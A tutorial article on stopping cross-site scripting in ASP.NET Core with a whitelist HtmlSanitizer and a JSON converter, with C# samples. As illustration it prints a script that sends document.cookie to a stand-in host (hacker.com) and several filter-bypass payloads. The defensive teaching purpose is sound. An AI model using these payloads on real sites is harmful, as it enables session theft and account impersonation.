🔐 Security in .NET: Preventing XSS (Cross-Site Scripting)
Modern web applications must treat user input as untrusted. One of the most common vulnerabilities developers face is XSS (Cross-Site Scripting).
If not handled properly, attackers can inject malicious JavaScript into your application to:
- Steal session cookies
- Impersonate users
- Modify UI content
- Execute unauthorized actions
- Redirect users to malicious websites
In this article, we will explore:
- ✔ What XSS is
- ✔ Why Regex-based protection fails
- ✔ Professional solution using HtmlSanitizer in .NET
- ✔ Automatic protection using JsonConverter
1️⃣ What is XSS (Cross-Site Scripting)?
XSS (Cross-Site Scripting) is a security vulnerability in which an attacker gets malicious script into content that a web page later renders, for example through a form field or an API request.
These scripts then execute in other users' browsers without their knowledge.
The Attack Example
Imagine a Product API where users submit a product description.
Normal Input
A nice blue shirt.
Malicious Input
<script>
fetch('https://hacker.com/steal?cookie=' + document.cookie)
</script>
What Happens Next?
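- An Admin opens a page that renders the stored description without encoding it
- The browser parses the <script> tag and runs the JavaScript automatically
- The script sends the Admin session cookie to the attacker (unless the cookie is marked HttpOnly)
- The attacker can then impersonate the Admin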
⚠️ Root Problem: We treated user input as safe data, but it actually contained executable code.
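To make the root problem concrete, here is a minimal sketch of the rendering step, assuming the page is built by pasting the description into an HTML string by hand. `RenderDemo`, `RenderUnsafe`, and `RenderEncoded` are hypothetical names used only for illustration. Output encoding is a separate defense from the sanitizer built later in this article; it appears here only to contrast "input treated as code" with "input treated as data".

```csharp
using System;
using System.Net;

public static class RenderDemo
{
    // Vulnerable: the description is inserted as-is, so any markup in it
    // becomes part of the page and a <script> element will run.
    public static string RenderUnsafe(string description) =>
        $"<div class=\"description\">{description}</div>";

    // Safer: HTML-encode first, so '<' and '>' become &lt; and &gt;
    // and the browser shows the payload as text instead of running it.
    public static string RenderEncoded(string description) =>
        $"<div class=\"description\">{WebUtility.HtmlEncode(description)}</div>";
}
```

With the malicious input from above, `RenderUnsafe` returns markup that still contains a live `<script>` element, while `RenderEncoded` returns the same text with the angle brackets encoded.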
2️⃣ Why Simple Regex Protection Fails
Many developers try to prevent XSS using Regex patterns like:
<.*?>
or by replacing suspicious keywords such as:
javascript:
Unfortunately, attackers can easily bypass Regex filters.
Common Bypass Techniques
Encoded Payload
%3cscript%3ealert(1)%3c/script%3e
Malformed HTML (a filter that strips the inner <body> tag reassembles <script>)
<scr<body>ipt>alert(1)</scr<body>ipt>
Event-based Injection
<img src="x" onerror="alert(1)">
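The bypasses above can be reproduced with a few lines of standard-library code. This is a sketch under stated assumptions: `NaiveFilters` and `BypassDemo` are hypothetical names, and the three filters are simplified stand-ins for the kind of Regex or keyword filtering described in this section, not code from any real project.

```csharp
using System;
using System.Text.RegularExpressions;

public static class NaiveFilters
{
    // Strips anything that looks like a tag, using the <.*?> pattern from the text.
    public static string StripTags(string input) =>
        Regex.Replace(input, "<.*?>", string.Empty);

    // Removes one specific tag, as a keyword-style blacklist might.
    public static string StripBodyTag(string input) =>
        input.Replace("<body>", string.Empty);

    // Removes the "javascript:" keyword in a single, case-sensitive pass.
    public static string StripJavascriptScheme(string input) =>
        input.Replace("javascript:", string.Empty);
}

public static class BypassDemo
{
    // The encoded payload contains no '<', so the Regex matches nothing.
    // Any later URL-decoding step restores the script tag.
    public static string EncodedPayload() =>
        Uri.UnescapeDataString(
            NaiveFilters.StripTags("%3cscript%3ealert(1)%3c/script%3e"));

    // Removing the inner <body> joins "<scr" and "ipt>" into a working tag.
    public static string NestedTag() =>
        NaiveFilters.StripBodyTag("<scr<body>ipt>alert(1)</scr<body>ipt>");

    // Removing the inner keyword leaves the outer pieces to form it again.
    public static string NestedKeyword() =>
        NaiveFilters.StripJavascriptScheme("javajavascript:script:alert(1)");
}
```

`EncodedPayload()` and `NestedTag()` both return `<script>alert(1)</script>`, and `NestedKeyword()` returns `javascript:alert(1)`. In each case the filter ran and the dangerous string still came out the other side.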
Why Regex Fails
Regex cannot fully understand HTML structure. HTML is not a regular language: it contains nested elements, attributes, encodings, and parser edge cases that a pattern cannot track.
Trying to block XSS using Regex becomes:
- ❌ fragile
- ❌ incomplete
- ❌ difficult to maintain
This approach is called Blacklisting, and it is an endless guessing game.
3️⃣ Professional Solution: Whitelisting Approach
Instead of trying to detect "bad" content, we allow only known safe content.
This approach is called Whitelisting.
We use a DOM-based parser that builds the same element tree a browser would, then keep only the elements and attributes on the allowed list.
Step A: The Brain — HtmlSanitizer
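We use the HtmlSanitizer library (namespace Ganss.Xss), which parses the input with the AngleSharp HTML parser and removes every element and attribute that is not explicitly allowed.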
Allowed formatting tags:
- <b>
- <i>
- <u>
- <strong>
- <em>
- <p>
- <br>
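Every other tag is removed automatically. By default HtmlSanitizer also drops the content inside a removed tag; its KeepChildNodes option keeps the inner content instead.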
XssSanitizer Implementation
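```csharp
using Ganss.Xss;

namespace ProductApi.Middleware;

public static class XssSanitizer
{
    // One shared instance, configured once in the static constructor.
    private static readonly HtmlSanitizer _sanitizer;

    static XssSanitizer()
    {
        _sanitizer = new HtmlSanitizer();

        // Replace the library's default allowed tags with a small formatting-only set.
        _sanitizer.AllowedTags.Clear();
        _sanitizer.AllowedTags.UnionWith(new[]
        {
            "b", "i", "u", "strong", "em", "p", "br"
        });

        // Allow no attributes at all: onerror, onclick, style, href, and the rest are dropped.
        _sanitizer.AllowedAttributes.Clear();

        _sanitizer.RemovingTag += (s, e) =>
        {
            // log removed tag attempt
        };
    }

    public static string Sanitize(string input)
    {
        // Null, empty, and whitespace-only values are returned unchanged.
        if (string.IsNullOrWhiteSpace(input))
            return input;

        return _sanitizer.Sanitize(input).Trim();
    }
}
```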
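A quick way to check the configuration is to run a mixed payload through it. The sketch below mirrors the settings of `XssSanitizer` so it stands alone; `SanitizerCheck` is a hypothetical name, and the code assumes the HtmlSanitizer NuGet package is referenced.

```csharp
using System;
using Ganss.Xss;

public static class SanitizerCheck
{
    // Same allowed tags and (empty) allowed attributes as XssSanitizer above.
    public static string Clean(string html)
    {
        var sanitizer = new HtmlSanitizer();
        sanitizer.AllowedTags.Clear();
        sanitizer.AllowedTags.UnionWith(new[] { "b", "i", "u", "strong", "em", "p", "br" });
        sanitizer.AllowedAttributes.Clear();
        return sanitizer.Sanitize(html).Trim();
    }

    // True when none of the markers from the attack examples survive.
    public static bool LooksClean(string html)
    {
        var cleaned = Clean(html);
        return !cleaned.Contains("<script", StringComparison.OrdinalIgnoreCase)
            && !cleaned.Contains("<img", StringComparison.OrdinalIgnoreCase)
            && !cleaned.Contains("onerror", StringComparison.OrdinalIgnoreCase)
            && !cleaned.Contains("onclick", StringComparison.OrdinalIgnoreCase);
    }
}
```

For an input such as `<p>A nice <b onclick="alert(1)">blue</b> shirt.</p><script>alert(1)</script>`, the allowed `<p>` and `<b>` elements should survive without the `onclick` attribute, and the `<script>` element should be gone.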
Step B: Automatic Protection using JsonConverter
Developers often forget to call Sanitize().
To ensure protection everywhere, we integrate sanitization directly into the JSON pipeline.
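Once the converter is registered (Step C), every string value deserialized from a JSON request body passes through the sanitizer automatically. Two limits are worth knowing. Query strings, route values, and form posts do not go through the JSON serializer, so they are not covered. And because the sanitizer returns HTML, fields that were never meant to hold HTML are affected too: a plain-text value such as Tom & Jerry may come back as Tom &amp;amp; Jerry.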
XssSanitizerConverter Implementation
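```csharp
using System;
using System.Text.Json;
using System.Text.Json.Serialization;
using ProductApi.Middleware; // namespace of XssSanitizer from Step A

public class XssSanitizerConverter : JsonConverter<string>
{
    // Called for each JSON string value that is deserialized into a string.
    public override string? Read(ref Utf8JsonReader reader,
                                 Type typeToConvert,
                                 JsonSerializerOptions options)
    {
        var value = reader.GetString();
        return value == null
            ? null
            : XssSanitizer.Sanitize(value);
    }

    // Outgoing strings are written unchanged; sanitization happens on input only.
    public override void Write(Utf8JsonWriter writer,
                               string value,
                               JsonSerializerOptions options)
    {
        writer.WriteStringValue(value);
    }
}
```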
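To see the converter mechanism on its own, the sketch below runs `JsonSerializer` directly, outside ASP.NET Core. So that it runs without the HtmlSanitizer package, it uses a stand-in converter that HTML-encodes strings with `WebUtility.HtmlEncode` instead of calling `XssSanitizer.Sanitize`. `EncodingStringConverter`, `ProductDto`, and `ConverterDemo` are hypothetical names, and encoding is a swapped-in technique, not the article's sanitizer.

```csharp
using System;
using System.Net;
using System.Text.Json;
using System.Text.Json.Serialization;

// Stand-in for XssSanitizerConverter: same shape, different cleaning step.
public sealed class EncodingStringConverter : JsonConverter<string>
{
    public override string? Read(ref Utf8JsonReader reader,
                                 Type typeToConvert,
                                 JsonSerializerOptions options)
    {
        var value = reader.GetString();
        return value is null ? null : WebUtility.HtmlEncode(value);
    }

    public override void Write(Utf8JsonWriter writer,
                               string value,
                               JsonSerializerOptions options)
    {
        writer.WriteStringValue(value);
    }
}

// Hypothetical request model for the Product API example.
public sealed class ProductDto
{
    public string? Name { get; set; }
    public string? Description { get; set; }
}

public static class ConverterDemo
{
    // Deserializes a request body with the converter registered in the options,
    // the same way the ASP.NET Core pipeline would after Step C.
    public static ProductDto? Parse(string json)
    {
        var options = new JsonSerializerOptions { PropertyNameCaseInsensitive = true };
        options.Converters.Add(new EncodingStringConverter());
        return JsonSerializer.Deserialize<ProductDto>(json, options);
    }
}
```

Parsing `{"name":"Blue shirt","description":"<script>alert(1)</script>"}` yields a `Description` of `&lt;script&gt;alert(1)&lt;/script&gt;`. No call site had to remember to clean the value, which is the point of putting the step in the converter.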
Step C: Register in ASP.NET Core Pipeline
```csharp
builder.Services.AddControllers()
    .AddJsonOptions(options =>
    {
        options.JsonSerializerOptions.Converters
            .Add(new XssSanitizerConverter());
    });
```
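The registration above configures the JSON options used by MVC controllers. Minimal API endpoints read a separate set of JSON options, so a project that uses them would need its own registration. A possible `Program.cs` sketch, assuming .NET 7 or later and the `XssSanitizerConverter` class from Step B; the `/products` route and `ProductRequest` record are hypothetical:

```csharp
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Http;
using Microsoft.Extensions.DependencyInjection;

var builder = WebApplication.CreateBuilder(args);

// Minimal APIs use the HTTP JSON options, not the MVC ones.
builder.Services.ConfigureHttpJsonOptions(options =>
{
    options.SerializerOptions.Converters.Add(new XssSanitizerConverter());
});

var app = builder.Build();

// String properties of the bound request pass through the converter.
app.MapPost("/products", (ProductRequest request) => Results.Ok(request));

app.Run();

// Hypothetical request model, for illustration only.
public record ProductRequest(string Name, string Description);
```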
4️⃣ Defense in Depth Strategy
Security should never rely on a single layer.
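- Tag Whitelisting: Only safe formatting tags are allowed.
- Attribute Stripping: Blocks hidden attacks like <img src="x" onerror="alert(1)">. Since attributes are removed, the attack fails. Here the <img> tag is not on the allowed list either, so it is removed outright; attribute stripping matters most on allowed tags, as in <b onmouseover="alert(1)">.
- Logging Suspicious Activity: We can detect attempts to inject <script>, <iframe>, and <object>.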
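The logging layer can hang off the `RemovingTag` event that Step A left as a placeholder. The sketch below is one possible shape, assuming the HtmlSanitizer NuGet package is referenced. `LoggingSanitizerFactory` and the `log` callback are hypothetical; in a real application the callback would likely forward to an `ILogger`.

```csharp
using System;
using Ganss.Xss;

public static class LoggingSanitizerFactory
{
    // Builds a sanitizer with the same allowed tags as Step A and reports
    // every removed element through the supplied callback.
    public static HtmlSanitizer Create(Action<string> log)
    {
        var sanitizer = new HtmlSanitizer();
        sanitizer.AllowedTags.Clear();
        sanitizer.AllowedTags.UnionWith(new[] { "b", "i", "u", "strong", "em", "p", "br" });
        sanitizer.AllowedAttributes.Clear();

        // e.Tag is the element being removed; e.Reason says why it was rejected.
        sanitizer.RemovingTag += (_, e) =>
            log($"Removed tag {e.Tag.TagName}: {e.Reason}");

        return sanitizer;
    }
}
```

A caller could collect the messages in a list during tests, or count them per client to spot repeated injection attempts. The event fires during `Sanitize`, so the callback should stay cheap.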
5️⃣ Summary Comparison
| Stage | Status | Strategy |
|---|---|---|
| Original | ❌ Vulnerable | Regex filtering |
| Improved | ✅ Secure | Whitelist HTML parsing |
| Integration | ✅ Automated | JSON pipeline sanitization |
6️⃣ Key Takeaways
- ✔ Never trust user input
- ✔ Regex is not reliable for HTML sanitization
- ✔ Prefer whitelist-based validation
- ✔ Use DOM-based parsers
- ✔ Automate security wherever possible
7️⃣ Where to Use This?
- Product descriptions
- Blog comments
- User profiles
- CMS editors
- Feedback forms
- Chat applications
- Review systems